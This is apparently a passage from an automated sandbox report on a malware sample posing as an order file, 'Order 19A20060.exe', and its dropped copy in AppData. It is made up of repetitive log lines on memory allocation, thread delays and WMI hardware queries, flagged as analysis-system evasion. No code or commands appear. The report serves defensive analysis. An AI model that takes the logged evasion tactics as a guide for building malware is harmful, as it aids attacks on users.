                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: Order 19A20060.exe PID: 7420, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: SgJzugoOJvLgL.exe PID: 7964, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\Order 19A20060.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\Order 19A20060.exeMemory allocated: 1750000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeMemory allocated: 3160000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeMemory allocated: 2F60000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeMemory allocated: 8100000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeMemory allocated: 9100000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeMemory allocated: 92B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeMemory allocated: A2B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeMemory allocated: 13D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeMemory allocated: 2E70000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeMemory allocated: 4E70000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeMemory allocated: 22C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeMemory allocated: 22C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeMemory allocated: 6EB0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeMemory allocated: 7EB0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeMemory allocated: 8050000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeMemory allocated: 9050000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeMemory allocated: 2900000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeMemory allocated: 2B60000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeMemory allocated: 2990000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199937Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199828Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199718Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199609Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199500Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199390Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199281Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199172Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199062Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1198953Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1198844Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1198719Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1198609Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1198500Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199953
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199844
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199734
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199625
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199515
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199406
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199297
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199187
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199078
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198969
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198844
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198734
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198625
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198515
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198406
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198297
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198187
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198078
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1197969
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1197859
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1197750
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1197640
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1197531
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1197422
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1197312
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1197202
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4072Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4673Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeWindow / User API: threadDelayed 3261Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeWindow / User API: threadDelayed 6584Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeWindow / User API: threadDelayed 1097
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeWindow / User API: threadDelayed 8756
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 7444Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep count: 4072 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep count: 271 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8108Thread sleep count: 3261 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -99875s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8108Thread sleep count: 6584 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -99765s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -99656s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -99547s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -99437s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -99328s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -99218s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -99109s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -98999s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -98891s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -98779s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -98656s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -98547s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -98437s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -98328s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -98219s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -98109s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -98000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -97890s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -97781s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -97668s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -97547s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -97437s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -97327s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -97218s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -97109s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -96998s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -96875s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -96765s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -96651s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -96531s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -96422s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -96312s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -96203s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -96094s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -1199937s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -1199828s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -1199718s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -1199609s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -1199500s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -1199390s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -1199281s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -1199172s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -1199062s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -1198953s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -1198844s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -1198719s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -1198609s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exe TID: 8100Thread sleep time: -1198500s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 8036Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -22136092888451448s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7412Thread sleep count: 1097 > 30
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -99890s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7412Thread sleep count: 8756 > 30
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -99776s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -99672s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -99562s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -99453s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -99344s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -99234s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -99125s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -99016s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -98906s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -98797s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -98687s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -98578s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -98469s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -98359s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -98250s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -98140s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -98031s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -97922s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -97812s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -97703s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -97594s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -97484s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1199953s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1199844s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1199734s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1199625s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1199515s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1199406s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1199297s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1199187s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1199078s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1198969s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1198844s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1198734s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1198625s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1198515s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1198406s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1198297s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1198187s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1198078s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1197969s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1197859s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1197750s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1197640s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1197531s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1197422s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1197312s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548Thread sleep time: -1197202s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\Order 19A20060.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\Order 19A20060.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 99875Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 99765Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 99656Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 99547Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 99437Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 99328Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 99218Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 99109Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 98999Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 98891Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 98779Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 98656Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 98547Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 98437Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 98328Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 98219Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 98109Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 98000Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 97890Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 97781Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 97668Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 97547Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 97437Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 97327Jump to behavior
